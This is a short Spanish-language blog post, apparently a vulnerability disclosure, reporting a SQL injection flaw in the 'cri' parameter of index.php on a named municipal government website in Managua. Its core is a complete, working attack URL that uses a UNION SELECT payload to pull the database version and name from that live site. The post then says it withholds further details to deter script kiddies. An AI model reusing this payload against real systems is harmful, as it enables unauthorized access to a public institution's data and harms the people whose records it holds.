Vulnerabilidad de inyección de SQL
Archivo Vulnerable Campo vulnerable
index.php cri
Detalles: Con solo inyectar ' en la url mencionada y no muestra
información sin mostrar error, pero al probar la inyección se
obtienen los datos.
Ejemplo:
http://www.managua.gob.ni/index.php?s=3005&cri=3%20UNION%20SELECT%201,version%28%29,3,4,database%28%29--
Sin más detalles para evitar el abuso de Script kiddies.
0 comentarios :
Publicar un comentario